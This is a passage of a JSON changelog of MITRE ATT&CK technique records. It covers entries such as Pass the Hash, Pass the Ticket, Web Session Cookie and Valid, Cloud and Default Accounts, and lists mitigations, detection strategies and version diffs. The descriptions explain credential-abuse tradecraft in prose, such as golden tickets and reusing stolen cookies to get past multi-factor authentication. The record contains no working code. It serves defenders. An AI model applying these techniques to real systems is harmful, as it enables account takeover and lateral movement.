                        {
                            "source_name": "okta",
                            "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.",
                            "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen"
                        },
                        {
                            "source_name": "Rhino Security Labs Enumerating AWS Roles",
                            "description": "Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through \u2018AssumeRole\u2019. Retrieved April 1, 2022.",
                            "url": "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration"
                        },
                        {
                            "source_name": "Staaldraad Phishing with OAuth 2017",
                            "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.",
                            "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft Threat Intelligence",
                        "Dylan Silva, AWS Security",
                        "Ian Davila, Tidal Cyber",
                        "Jack Burns, HubSpot",
                        "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
                        "Mark Wee",
                        "Pawel Partyka, Microsoft Threat Intelligence",
                        "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
                        "Shailesh Tiwary (Indian Army)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "IaaS",
                        "Identity Provider",
                        "Office Suite",
                        "SaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:48:23.373000+00:00\", \"old_value\": \"2025-10-24 17:49:35.227000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.8\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][3]\": {\"source_name\": \"AWS Logging IAM Calls\", \"description\": \"AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.\", \"url\": \"https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html\"}, \"root['external_references'][7]\": {\"source_name\": \"GCP Monitoring Service Account Usage\", \"description\": \"Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.\", \"url\": \"https://cloud.google.com/iam/docs/service-account-monitoring\"}}}",
                    "previous_version": "1.8",
                    "version_change": "1.8 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1021: Restrict Web-Based Content",
                            "M1036: Account Use Policies",
                            "M1041: Encrypt Sensitive Information",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0185: Behavioral Detection Strategy for Use Alternate Authentication Material: Application Access Token (T1550.001)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 16:36:51.184000+00:00",
                    "modified": "2026-04-15 22:48:07.235000+00:00",
                    "name": "Pass the Hash",
                    "description": "Adversaries may \u201cpass the hash\u201d using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1550/002",
                            "external_id": "T1550.002"
                        },
                        {
                            "source_name": "Stealthbits Overpass-the-Hash",
                            "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
                            "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft 365 Defender",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:48:07.235000+00:00\", \"old_value\": \"2025-10-24 17:49:32.459000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1051: Update Software",
                            "M1052: User Account Control"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0409: Detection Strategy for T1550.002 - Pass the Hash (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 17:03:43.072000+00:00",
                    "modified": "2026-04-15 22:47:57.805000+00:00",
                    "name": "Pass the Ticket",
                    "description": "Adversaries may \u201cpass the ticket\u201d using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1550/003",
                            "external_id": "T1550.003"
                        },
                        {
                            "source_name": "Campbell 2014",
                            "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved November 17, 2024.",
                            "url": "https://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf"
                        },
                        {
                            "source_name": "GentilKiwi Pass the Ticket",
                            "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved September 12, 2024.",
                            "url": "https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"
                        },
                        {
                            "source_name": "ADSecurity AD Kerberos Attacks",
                            "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.",
                            "url": "https://adsecurity.org/?p=556"
                        },
                        {
                            "source_name": "Stealthbits Overpass-the-Hash",
                            "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
                            "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ryan Becwar",
                        "Vincent Le Toux"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:47:57.805000+00:00\", \"old_value\": \"2025-10-24 17:48:59.861000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}, \"root['external_references'][1]\": {\"source_name\": \"CERT-EU Golden Ticket Protection\", \"description\": \"Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.\", \"url\": \"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1015: Active Directory Configuration",
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0352: Detection Strategy for T1550.003 - Pass the Ticket (Windows)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-30 17:48:49.395000+00:00",
                    "modified": "2026-04-15 22:48:02.590000+00:00",
                    "name": "Web Session Cookie",
                    "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1550/004",
                            "external_id": "T1550.004"
                        },
                        {
                            "source_name": "Unit 42 Mac Crypto Cookies January 2019",
                            "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"
                        },
                        {
                            "source_name": "Pass The Cookie",
                            "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.",
                            "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jack Burns, HubSpot",
                        "Johann Rehberger"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Office Suite",
                        "SaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:48:02.590000+00:00\", \"old_value\": \"2025-10-24 17:49:20.943000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_removed\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"defense-evasion\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0074: Detect Use of Stolen Web Session Cookies Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:00.645000+00:00",
                    "modified": "2026-04-15 22:49:37.148000+00:00",
                    "name": "Valid Accounts",
                    "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1078",
                            "external_id": "T1078"
                        },
                        {
                            "source_name": "volexity_0day_sophos_FW",
                            "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.",
                            "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
                        },
                        {
                            "source_name": "CISA MFA PrintNightmare",
                            "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved March 16, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"
                        },
                        {
                            "source_name": "TechNet Credential Theft",
                            "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jon Sternstein, Stern Security",
                        "Mark Wee",
                        "Menachem Goldstein",
                        "Netskope",
                        "Praetorian",
                        "Prasad Somasamudram, McAfee",
                        "Sekhar Sarukkai, McAfee",
                        "Syed Ummar Farooqh, McAfee",
                        "Yossi Weizman, Azure Defender Research Team"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:49:37.148000+00:00\", \"old_value\": \"2025-10-24 17:49:14.095000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.8\"}}, \"iterable_item_removed\": {\"root['external_references'][4]\": {\"source_name\": \"TechNet Audit Policy\", \"description\": \"Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.\", \"url\": \"https://technet.microsoft.com/en-us/library/dn487457.aspx\"}}}",
                    "previous_version": "2.8",
                    "version_change": "2.8 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1013: Application Developer Guidance",
                            "M1015: Active Directory Configuration",
                            "M1017: User Training",
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1036: Account Use Policies"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0560: Detection of Valid Account Abuse Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:36:57.378000+00:00",
                    "modified": "2026-04-15 22:51:18.773000+00:00",
                    "name": "Cloud Accounts",
                    "description": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nService or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.\n\nAn adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. \n\nCloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1078/004",
                            "external_id": "T1078.004"
                        },
                        {
                            "source_name": "AWS Identity Federation",
                            "description": "Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.",
                            "url": "https://aws.amazon.com/identity/federation/"
                        },
                        {
                            "source_name": "SpecterOps Managed Identity 2022",
                            "description": "Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.",
                            "url": "https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c"
                        },
                        {
                            "source_name": "Google Federating GC",
                            "description": "Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.",
                            "url": "https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction"
                        },
                        {
                            "source_name": "Microsoft Deploying AD Federation",
                            "description": "Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alon Klayman, Hunters Security",
                        "Arun Seelagan, CISA",
                        "Eliraz Levi, Hunters Security",
                        "Jon Sternstein, Stern Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "Identity Provider",
                        "Office Suite",
                        "SaaS"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:51:18.773000+00:00\", \"old_value\": \"2025-10-24 17:49:35.682000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.9\"}}}",
                    "previous_version": "1.9",
                    "version_change": "1.9 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1015: Active Directory Configuration",
                            "M1017: User Training",
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1036: Account Use Policies"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0546: Detection of Abused or Compromised Cloud Accounts for Access and Persistence"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:15:31.974000+00:00",
                    "modified": "2026-04-15 22:50:51.753000+00:00",
                    "name": "Default Accounts",
                    "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)\n\nDefault accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account\u2019s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1078/001",
                            "external_id": "T1078.001"
                        },
                        {
                            "source_name": "Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023",
                            "description": "Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/"
                        },
                        {
                            "source_name": "AWS Root User",
